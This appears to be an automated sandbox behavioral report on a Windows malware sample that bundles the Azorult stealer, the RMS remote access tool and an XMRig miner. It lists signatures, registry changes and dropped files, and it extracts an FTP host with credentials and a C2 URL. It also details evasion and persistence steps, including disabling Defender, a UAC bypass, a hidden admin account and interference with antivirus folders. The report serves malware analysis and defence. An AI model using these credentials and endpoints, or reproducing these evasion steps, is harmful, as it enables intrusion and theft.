Behavioral Report

Resubmissions

19-01-2021 19:24

210119-s26yznnqsn 10

19-11-2020 13:14

201119-s41ec6lt86 10

Analysis

max time kernel
1804s
max time network
1816s
platform
windows10_x64
resource
win10v20201028
submitted
19-11-2020 13:14

Sharing

Copy URL

Twitter E-mail

Report Files Registry Network Processes Mutex Misc

General

Target

LtHv0O2KZDK4M637.exe

Score

10^/10

azorult rms xmrig aspackv2 discovery evasion infostealer miner persistence rat spyware stealer trojan upx

Malware Config

Extracted

Credentials

Protocol: ftp
Host:
109.248.203.81
Port:
21
Username:
alex
Password:
easypassword

Extracted

Family

azorult

http://195.245.112.115/index.php

Signatures

Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
trojan infostealer azorult
Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

TTPs:

Modify Registry Modify Existing Service Disabling Security Tools
Modifies visiblity of hidden/system files in Explorer 2 TTPs
evasion

TTPs:

Hidden Files and Directories Modify Registry
RMS
Remote Manipulator System (RMS) is a remote access tool developed by Russian organization TektonIT.
trojan rat rms
UAC bypass 3 TTPs
evasion trojan

TTPs:

Bypass User Account Control Disabling Security Tools Modify Registry
Windows security bypass 2 TTPs
evasion trojan

TTPs:

Disabling Security Tools Modify Registry
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
ACProtect 1.3x - 1.4x DLL software 2 IoCs
Detects file using ACProtect software.

Processes:

resource yara_rule

behavioral26/files/0x000100000001abe6-33.dat acprotect
behavioral26/files/0x000100000001abe5-32.dat acprotect
Detected Stratum cryptominer command
Looks to be attempting to contact Stratum mining pool.
miner
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

TTPs:

Account Manipulation
XMRig Miner Payload 2 IoCs
miner

Processes:

resource yara_rule

behavioral26/files/0x000200000001abeb-758.dat xmrig
behavioral26/files/0x000200000001abeb-764.dat xmrig

resource	yara_rule
behavioral26/files/0x000100000001abe6-33.dat	acprotect
behavioral26/files/0x000100000001abe5-32.dat	acprotect

resource	yara_rule
behavioral26/files/0x000200000001abeb-758.dat	xmrig
behavioral26/files/0x000200000001abeb-764.dat	xmrig

ASPack v2.12-2.42 9 IoCs

Detects executables packed with ASPack v2.12-2.42

aspackv2

Processes:

resource	yara_rule
behavioral26/files/0x000100000001abe3-19.dat	aspack_v212_v242
behavioral26/files/0x000100000001abe3-18.dat	aspack_v212_v242
behavioral26/files/0x000100000001abe3-28.dat	aspack_v212_v242
behavioral26/files/0x000100000001abe3-30.dat	aspack_v212_v242
behavioral26/files/0x000100000001abe3-31.dat	aspack_v212_v242
behavioral26/files/0x000200000001a50e-34.dat	aspack_v212_v242
behavioral26/files/0x000200000001a50e-37.dat	aspack_v212_v242
behavioral26/files/0x000200000001a50e-38.dat	aspack_v212_v242
behavioral26/files/0x000200000001a50e-140.dat	aspack_v212_v242

Blocks application from running via registry modification
Adds application to list of disallowed applications.
evasion

Drops file in Drivers directory 4 IoCs

Processes:

taskhost.exeLtHv0O2KZDK4M637.execmd.exe

description	ioc	process
File opened for modification	C:\Windows\SysWOW64\drivers\conhost.exe	taskhost.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	LtHv0O2KZDK4M637.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	cmd.exe
File created	C:\Windows\SysWOW64\drivers\conhost.exe	taskhost.exe

Executes dropped EXE 20 IoCs

Processes:

wini.exewinit.exerutserv.exesys.exerutserv.exerutserv.exerutserv.exerfusclient.exerfusclient.exerfusclient.execheat.exetaskhost.exetaskhostw.exeR8.exewinlogon.exeRar.exeRDPWInst.exeRDPWInst.exeaudiodg.exeMicrosoftHost.exe

pid	process
912	wini.exe
2176	winit.exe
3628	rutserv.exe
2972	sys.exe
504	rutserv.exe
696	rutserv.exe
2276	rutserv.exe
2072	rfusclient.exe
2272	rfusclient.exe
372	rfusclient.exe
2196	cheat.exe
1696	taskhost.exe
1296	taskhostw.exe
360	R8.exe
1732	winlogon.exe
4332	Rar.exe
4224	RDPWInst.exe
4480	RDPWInst.exe
2428	audiodg.exe
5208	MicrosoftHost.exe

Modifies Windows Firewall 1 TTPs
evasion

TTPs:

Modify Existing Service
Registers new Print Monitor 2 TTPs
persistence

TTPs:

Registry Run Keys / Startup Folder Modify Registry
Sets DLL path for service in the registry 2 TTPs
persistence

TTPs:

Registry Run Keys / Startup Folder Modify Registry
Sets file to hidden 1 TTPs
Modifies file attributes to stop it showing in Explorer etc.
evasion

TTPs:

Hidden Files and Directories
Stops running service(s) 3 TTPs
evasion

TTPs:

Modify Existing Service Service Stop

UPX packed file 4 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral26/files/0x000100000001abe6-33.dat	upx
behavioral26/files/0x000100000001abe5-32.dat	upx
behavioral26/files/0x000200000001abf1-269.dat	upx
behavioral26/files/0x000200000001abf1-268.dat	upx

Loads dropped DLL 5 IoCs

Processes:

sys.exesvchost.exe

pid process

2972 sys.exe
2972 sys.exe
2972 sys.exe
2972 sys.exe
4664 svchost.exe

pid	process
2972	sys.exe
2972	sys.exe
2972	sys.exe
2972	sys.exe
4664	svchost.exe

Modifies file permissions 1 TTPs 64 IoCs

discovery

TTPs:

File Permissions Modification

Processes:

icacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exe

pid	process
5908	icacls.exe
2256	icacls.exe
5768	icacls.exe
3420	icacls.exe
816	icacls.exe
6076	icacls.exe
5176	icacls.exe
5344	icacls.exe
4176	icacls.exe
5356	icacls.exe
5444	icacls.exe
5652	icacls.exe
4616	icacls.exe
1056	icacls.exe
5876	icacls.exe
4376	icacls.exe
3924	icacls.exe
5688	icacls.exe
5332	icacls.exe
5984	icacls.exe
5388	icacls.exe
3956	icacls.exe
4808	icacls.exe
5764	icacls.exe
5264	icacls.exe
6056	icacls.exe
6096	icacls.exe
5540	icacls.exe
4380	icacls.exe
5620	icacls.exe
4356	icacls.exe
5676	icacls.exe
4420	icacls.exe
4580	icacls.exe
3980	icacls.exe
5304	icacls.exe
6044	icacls.exe
5936	icacls.exe
5076	icacls.exe
4520	icacls.exe
5952	icacls.exe
4764	icacls.exe
6100	icacls.exe
5576	icacls.exe
5312	icacls.exe
5300	icacls.exe
1764	icacls.exe
5296	icacls.exe
3892	icacls.exe
4840	icacls.exe
5832	icacls.exe
5244	icacls.exe
5272	icacls.exe
5424	icacls.exe
6084	icacls.exe
5956	icacls.exe
5380	icacls.exe
5484	icacls.exe
5592	icacls.exe
5520	icacls.exe
6068	icacls.exe
6060	icacls.exe
2704	icacls.exe
2652	icacls.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

TTPs:

Data from Local System Credentials in Files
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
spyware stealer

TTPs:

Data from Local System Credentials in Files
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

TTPs:

Data from Local System Credentials in Files
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

TTPs:

Data from Local System Credentials in Files
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

TTPs:

Data from Local System Credentials in Files

Adds Run key to start application 2 TTPs 4 IoCs

persistence

TTPs:

Registry Run Keys / Startup Folder Modify Registry

Processes:

LtHv0O2KZDK4M637.exetaskhostw.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run	LtHv0O2KZDK4M637.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio = "C:\\ProgramData\\RealtekHD\\taskhostw.exe"	LtHv0O2KZDK4M637.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	taskhostw.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio = "C:\\ProgramData\\RealtekHD\\taskhostw.exe"	taskhostw.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

TTPs:

Query Registry
Checks whether UAC is enabled 1 TTPs 1 IoCs
evasion trojan

TTPs:

System Information Discovery

Processes:

LtHv0O2KZDK4M637.exe

description ioc process

Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" LtHv0O2KZDK4M637.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs

TTPs:

Web Service
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

6 ip-api.com

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	LtHv0O2KZDK4M637.exe

flow	ioc
6	ip-api.com

Modifies WinLogon 2 TTPs 7 IoCs

persistence

TTPs:

Winlogon Helper DLL Modify Registry

Processes:

RDPWInst.exeLtHv0O2KZDK4M637.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1"	RDPWInst.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList	LtHv0O2KZDK4M637.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts	LtHv0O2KZDK4M637.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0"	LtHv0O2KZDK4M637.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList	LtHv0O2KZDK4M637.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts	LtHv0O2KZDK4M637.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0"	LtHv0O2KZDK4M637.exe

autoit_exe 2 IoCs
AutoIT scripts compiled to PE executables.

Processes:

resource yara_rule

behavioral26/files/0x000100000001abe4-8.dat autoit_exe
behavioral26/files/0x000100000001abe4-9.dat autoit_exe

resource	yara_rule
behavioral26/files/0x000100000001abe4-8.dat	autoit_exe
behavioral26/files/0x000100000001abe4-9.dat	autoit_exe

Drops file in Program Files directory 31 IoCs

Processes:

taskhost.exeattrib.exeattrib.exeRDPWInst.exeattrib.exeattrib.exeattrib.exeattrib.exe

description	ioc	process
File opened for modification	C:\Program Files (x86)\GRIZZLY Antivirus	taskhost.exe
File opened for modification	C:\Program Files (x86)\Panda Security	taskhost.exe
File opened for modification	C:\Program Files\ESET	attrib.exe
File opened for modification	C:\Program Files\AVAST Software\Avast	attrib.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.ini	RDPWInst.exe
File opened for modification	C:\Program Files (x86)\360	taskhost.exe
File opened for modification	C:\Program Files (x86)\SpyHunter	taskhost.exe
File opened for modification	C:\Program Files\COMODO	taskhost.exe
File opened for modification	C:\Program Files\Malwarebytes\Anti-Malware	attrib.exe
File opened for modification	C:\Program Files\RDP Wrapper\rdpwrap.ini	attrib.exe
File opened for modification	C:\Program Files (x86)\Microsoft JDX	taskhost.exe
File opened for modification	C:\Program Files\Malwarebytes	taskhost.exe
File opened for modification	C:\Program Files\Kaspersky Lab	taskhost.exe
File opened for modification	C:\Program Files\Cezurity	taskhost.exe
File opened for modification	C:\Program Files\SpyHunter	taskhost.exe
File opened for modification	C:\Program Files\AVG	taskhost.exe
File opened for modification	C:\Program Files (x86)\Kaspersky Lab	taskhost.exe
File opened for modification	C:\Program Files (x86)\Cezurity	taskhost.exe
File opened for modification	C:\Program Files\RDP Wrapper	attrib.exe
File opened for modification	C:\Program Files (x86)\AVAST Software	taskhost.exe
File opened for modification	C:\Program Files\ESET	taskhost.exe
File opened for modification	C:\Program Files (x86)\Zaxar	taskhost.exe
File created	C:\Program Files\Common Files\System\iexplore.exe	taskhost.exe
File opened for modification	C:\Program Files\ByteFence	taskhost.exe
File opened for modification	C:\Program Files\Enigma Software Group	taskhost.exe
File opened for modification	C:\Program Files\AVAST Software	taskhost.exe
File opened for modification	C:\Program Files (x86)\AVG	taskhost.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.dll	RDPWInst.exe
File opened for modification	C:\Program Files\RDP Wrapper\rdpwrap.dll	attrib.exe
File created	C:\Program Files\Common Files\System\iediagcmd.exe	taskhost.exe
File opened for modification	C:\Program Files\360\Total Security	attrib.exe

Drops file in Windows directory 8 IoCs

Processes:

taskhost.exeattrib.exe

description	ioc	process
File opened for modification	C:\Windows\java.exe	taskhost.exe
File opened for modification	C:\WINDOWS\McMwt	attrib.exe
File created	C:\Windows\boy.exe	taskhost.exe
File opened for modification	C:\Windows\boy.exe	taskhost.exe
File created	C:\Windows\svchost.exe	taskhost.exe
File opened for modification	C:\Windows\svchost.exe	taskhost.exe
File opened for modification	C:\Windows\NetworkDistribution	taskhost.exe
File created	C:\Windows\java.exe	taskhost.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

TTPs:

System Information Discovery

Checks SCSI registry key(s) 3 TTPs 6 IoCs

SCSI information is often read in order to detect sandboxing environments.

TTPs:

Query Registry Peripheral Device Discovery System Information Discovery

Processes:

spoolsv.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000	spoolsv.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{3b2ce006-5e61-4fde-bab8-9b8aac9b26df}\0002	spoolsv.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000	spoolsv.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{3b2ce006-5e61-4fde-bab8-9b8aac9b26df}\0002	spoolsv.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\HardwareID	spoolsv.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\HardwareID	spoolsv.exe

Checks processor information in registry 2 TTPs 4 IoCs

Processor information is often read in order to detect sandboxing environments.

TTPs:

Query Registry System Information Discovery

Processes:

sys.exewinit.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	sys.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	winit.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	winit.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	sys.exe

Delays execution with timeout.exe 9 IoCs
evasion

Processes:

timeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exe

pid process

4552 timeout.exe
5596 timeout.exe
5924 timeout.exe
3452 timeout.exe
3968 timeout.exe
5064 timeout.exe
5776 timeout.exe
2204 timeout.exe
1268 timeout.exe
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.

TTPs:

System Information Discovery Command-Line Interface

Processes:

ipconfig.exe

pid process

4660 ipconfig.exe
Kills process with taskkill 6 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid process

1288 taskkill.exe
2016 taskkill.exe
4500 taskkill.exe
5944 taskkill.exe
5384 taskkill.exe
5440 taskkill.exe

pid	process
4552	timeout.exe
5596	timeout.exe
5924	timeout.exe
3452	timeout.exe
3968	timeout.exe
5064	timeout.exe
5776	timeout.exe
2204	timeout.exe
1268	timeout.exe

pid	process
4660	ipconfig.exe

pid	process
1288	taskkill.exe
2016	taskkill.exe
4500	taskkill.exe
5944	taskkill.exe
5384	taskkill.exe
5440	taskkill.exe

Modifies data under HKEY_USERS 18 IoCs

Processes:

spoolsv.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows NT\CurrentVersion\PrinterPorts	spoolsv.exe
Set value (str)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows NT\CurrentVersion\Devices\Microsoft XPS Document Writer = "winspool,Ne00:"	spoolsv.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\PrinterPorts\Microsoft XPS Document Writer = "winspool,Ne00:,15,45"	spoolsv.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\Devices	spoolsv.exe
Set value (str)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows NT\CurrentVersion\Devices\Microsoft Print to PDF = "winspool,Ne01:"	spoolsv.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\Devices\Microsoft Print to PDF = "winspool,Ne01:"	spoolsv.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\PrinterPorts\Microsoft Print to PDF = "winspool,Ne01:,15,45"	spoolsv.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\Devices\Fax = "winspool,Ne02:"	spoolsv.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows NT\CurrentVersion\Devices	spoolsv.exe
Set value (str)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows NT\CurrentVersion\PrinterPorts\Microsoft XPS Document Writer = "winspool,Ne00:,15,45"	spoolsv.exe
Set value (str)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows NT\CurrentVersion\PrinterPorts\Microsoft Print to PDF = "winspool,Ne01:,15,45"	spoolsv.exe
Set value (str)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows NT\CurrentVersion\Devices\Fax = "winspool,Ne02:"	spoolsv.exe
Set value (str)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows NT\CurrentVersion\PrinterPorts\Fax = "winspool,Ne02:,15,45"	spoolsv.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\PrinterPorts	spoolsv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows NT\CurrentVersion\Devices	spoolsv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows NT\CurrentVersion\PrinterPorts	spoolsv.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\Devices\Microsoft XPS Document Writer = "winspool,Ne00:"	spoolsv.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\PrinterPorts\Fax = "winspool,Ne02:,15,45"	spoolsv.exe

Modifies registry class 6 IoCs

Processes:

winit.exeR8.execmd.exewini.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\MIME\Database	winit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Charset	winit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Codepage	winit.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings	R8.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings	cmd.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings	wini.exe

NTFS ADS 2 IoCs

Processes:

taskhostw.exeLtHv0O2KZDK4M637.exe

description	ioc	process
File opened for modification	C:\ProgramData\Microsoft\Intel\winmgmts:\localhost\root\CIMV2	taskhostw.exe
File opened for modification	C:\Users\Admin\AppData\Local\Temp\WinMgmts:\	LtHv0O2KZDK4M637.exe

Runs .reg file with regedit 2 IoCs

Processes:

regedit.exeregedit.exe

pid process

2060 regedit.exe
1428 regedit.exe
Runs net.exe

pid	process
2060	regedit.exe
1428	regedit.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

LtHv0O2KZDK4M637.exe

pid	process
1192	LtHv0O2KZDK4M637.exe
1192	LtHv0O2KZDK4M637.exe
1192	LtHv0O2KZDK4M637.exe
1192	LtHv0O2KZDK4M637.exe
1192	LtHv0O2KZDK4M637.exe
1192	LtHv0O2KZDK4M637.exe
1192	LtHv0O2KZDK4M637.exe
1192	LtHv0O2KZDK4M637.exe
1192	LtHv0O2KZDK4M637.exe
1192	LtHv0O2KZDK4M637.exe
1192	LtHv0O2KZDK4M637.exe
1192	LtHv0O2KZDK4M637.exe
1192	LtHv0O2KZDK4M637.exe
1192	LtHv0O2KZDK4M637.exe
1192	LtHv0O2KZDK4M637.exe
1192	LtHv0O2KZDK4M637.exe
1192	LtHv0O2KZDK4M637.exe
1192	LtHv0O2KZDK4M637.exe
1192	LtHv0O2KZDK4M637.exe
1192	LtHv0O2KZDK4M637.exe
1192	LtHv0O2KZDK4M637.exe
1192	LtHv0O2KZDK4M637.exe
1192	LtHv0O2KZDK4M637.exe
1192	LtHv0O2KZDK4M637.exe
1192	LtHv0O2KZDK4M637.exe
1192	LtHv0O2KZDK4M637.exe
1192	LtHv0O2KZDK4M637.exe
1192	LtHv0O2KZDK4M637.exe
1192	LtHv0O2KZDK4M637.exe
1192	LtHv0O2KZDK4M637.exe
1192	LtHv0O2KZDK4M637.exe
1192	LtHv0O2KZDK4M637.exe
1192	LtHv0O2KZDK4M637.exe
1192	LtHv0O2KZDK4M637.exe
1192	LtHv0O2KZDK4M637.exe
1192	LtHv0O2KZDK4M637.exe
1192	LtHv0O2KZDK4M637.exe
1192	LtHv0O2KZDK4M637.exe
1192	LtHv0O2KZDK4M637.exe
1192	LtHv0O2KZDK4M637.exe
1192	LtHv0O2KZDK4M637.exe
1192	LtHv0O2KZDK4M637.exe
1192	LtHv0O2KZDK4M637.exe
1192	LtHv0O2KZDK4M637.exe
1192	LtHv0O2KZDK4M637.exe
1192	LtHv0O2KZDK4M637.exe
1192	LtHv0O2KZDK4M637.exe
1192	LtHv0O2KZDK4M637.exe
1192	LtHv0O2KZDK4M637.exe
1192	LtHv0O2KZDK4M637.exe
1192	LtHv0O2KZDK4M637.exe
1192	LtHv0O2KZDK4M637.exe
1192	LtHv0O2KZDK4M637.exe
1192	LtHv0O2KZDK4M637.exe
1192	LtHv0O2KZDK4M637.exe
1192	LtHv0O2KZDK4M637.exe
1192	LtHv0O2KZDK4M637.exe
1192	LtHv0O2KZDK4M637.exe
1192	LtHv0O2KZDK4M637.exe
1192	LtHv0O2KZDK4M637.exe
1192	LtHv0O2KZDK4M637.exe
1192	LtHv0O2KZDK4M637.exe
1192	LtHv0O2KZDK4M637.exe
1192	LtHv0O2KZDK4M637.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

taskhostw.exe

pid process

1296 taskhostw.exe
Suspicious behavior: LoadsDriver 3 IoCs

Processes:

pid process

620
620
620
Suspicious behavior: SetClipboardViewer 1 IoCs

Processes:

rfusclient.exe

pid process

372 rfusclient.exe

pid	process
1296	taskhostw.exe

pid	process
620
620
620

pid	process
372	rfusclient.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

rutserv.exerutserv.exerutserv.exeLtHv0O2KZDK4M637.exe

description	pid	process
Token: SeDebugPrivilege	3628	rutserv.exe
Token: SeDebugPrivilege	696	rutserv.exe
Token: SeTakeOwnershipPrivilege	2276	rutserv.exe
Token: SeTcbPrivilege	2276	rutserv.exe
Token: SeTcbPrivilege	2276	rutserv.exe
Token: SeDebugPrivilege	1192	LtHv0O2KZDK4M637.exe
Token: SeDebugPrivilege	1192	LtHv0O2KZDK4M637.exe
Token: 9800651925390289900	1192	LtHv0O2KZDK4M637.exe
Token: 9800658522458876690	1192	LtHv0O2KZDK4M637.exe
Token: 9800665119528512256	1192	LtHv0O2KZDK4M637.exe
Token: 9800687109789641548	1192	LtHv0O2KZDK4M637.exe
Token: 9800702502950726298	1192	LtHv0O2KZDK4M637.exe
Token: 9800712398553737857	1192	LtHv0O2KZDK4M637.exe
Token: 9800717896110762672	1192	LtHv0O2KZDK4M637.exe
Token: 9800725592690911909	1192	LtHv0O2KZDK4M637.exe
Token: 9800727791712725727	1192	LtHv0O2KZDK4M637.exe
Token: 9800754179988122135	1192	LtHv0O2KZDK4M637.exe
Token: 9800760777056709125	1192	LtHv0O2KZDK4M637.exe
Token: 9800773971226389081	1192	LtHv0O2KZDK4M637.exe
Token: 9800797060966313368	1192	LtHv0O2KZDK4M637.exe
Token: 9800799259989175698	1192	LtHv0O2KZDK4M637.exe
Token: 9800803658034900366	1192	LtHv0O2KZDK4M637.exe
Token: 9800817951684685217	1192	LtHv0O2KZDK4M637.exe
Token: 9800927902860307709	1192	LtHv0O2KZDK4M637.exe
Token: 9800945495043206157	1192	LtHv0O2KZDK4M637.exe
Token: 9800955390545292328	1192	LtHv0O2KZDK4M637.exe
Token: 9800983479627672679	1192	LtHv0O2KZDK4M637.exe
Token: 9800987276376928147	1192	LtHv0O2KZDK4M637.exe
Token: 9801108222667910857	1192	LtHv0O2KZDK4M637.exe
Token: 9801113720224935672	1192	LtHv0O2KZDK4M637.exe
Token: 9801119217783271147	1192	LtHv0O2KZDK4M637.exe
Token: 9801132411919396367	1192	LtHv0O2KZDK4M637.exe
Token: 9801139009021537853	1192	LtHv0O2KZDK4M637.exe
Token: 9801147805114035749	1192	LtHv0O2KZDK4M637.exe
Token: 9801166496807186024	1192	LtHv0O2KZDK4M637.exe
Token: 9801175292899680656	1192	LtHv0O2KZDK4M637.exe
Token: 9801178591433056649	1192	LtHv0O2KZDK4M637.exe
Token: 9801179690944356748	1192	LtHv0O2KZDK4M637.exe
Token: 9801185188501643711	1192	LtHv0O2KZDK4M637.exe
Token: 9801189586548416939	1192	LtHv0O2KZDK4M637.exe
Token: 9801203880195842498	1192	LtHv0O2KZDK4M637.exe
Token: 9801204979708453313	1192	LtHv0O2KZDK4M637.exe
Token: 9801217074334065126	1192	LtHv0O2KZDK4M637.exe
Token: 9801220372867440927	1192	LtHv0O2KZDK4M637.exe
Token: 9801230268471238970	1192	LtHv0O2KZDK4M637.exe
Token: 9801237965083894063	1192	LtHv0O2KZDK4M637.exe
Token: 9801240164107804961	1192	LtHv0O2KZDK4M637.exe
Token: 9801248960198205769	1192	LtHv0O2KZDK4M637.exe
Token: 9801264353359290727	1192	LtHv0O2KZDK4M637.exe
Token: 9801284144564002985	1192	LtHv0O2KZDK4M637.exe
Token: 9801288542610776229	1192	LtHv0O2KZDK4M637.exe
Token: 9801298438213525696	1192	LtHv0O2KZDK4M637.exe
Token: 9801302836258201852	1192	LtHv0O2KZDK4M637.exe
Token: 867634522891771310	1192	LtHv0O2KZDK4M637.exe
Token: 85899345940	1192	LtHv0O2KZDK4M637.exe
Token: 0	1192	LtHv0O2KZDK4M637.exe
Token: 274877907072	1192	LtHv0O2KZDK4M637.exe
Token: 0	1192	LtHv0O2KZDK4M637.exe
Token: 9920249032593447144	1192	LtHv0O2KZDK4M637.exe
Token: 9920249032593447144	1192	LtHv0O2KZDK4M637.exe
Token: 0	1192	LtHv0O2KZDK4M637.exe
Token: 9920249032593447144	1192	LtHv0O2KZDK4M637.exe
Token: 6937813002834471071	1192	LtHv0O2KZDK4M637.exe
Token: 6937813002834471071	1192	LtHv0O2KZDK4M637.exe

Suspicious use of SetWindowsHookEx 13 IoCs

Processes:

winit.exerutserv.exerutserv.exerutserv.exerutserv.exeWinMail.exeWinMail.exetaskhost.exetaskhostw.exeR8.exewinlogon.exeaudiodg.exeMicrosoftHost.exe

pid	process
2176	winit.exe
3628	rutserv.exe
504	rutserv.exe
696	rutserv.exe
2276	rutserv.exe
428	WinMail.exe
2872	WinMail.exe
1696	taskhost.exe
1296	taskhostw.exe
360	R8.exe
1732	winlogon.exe
2428	audiodg.exe
5208	MicrosoftHost.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

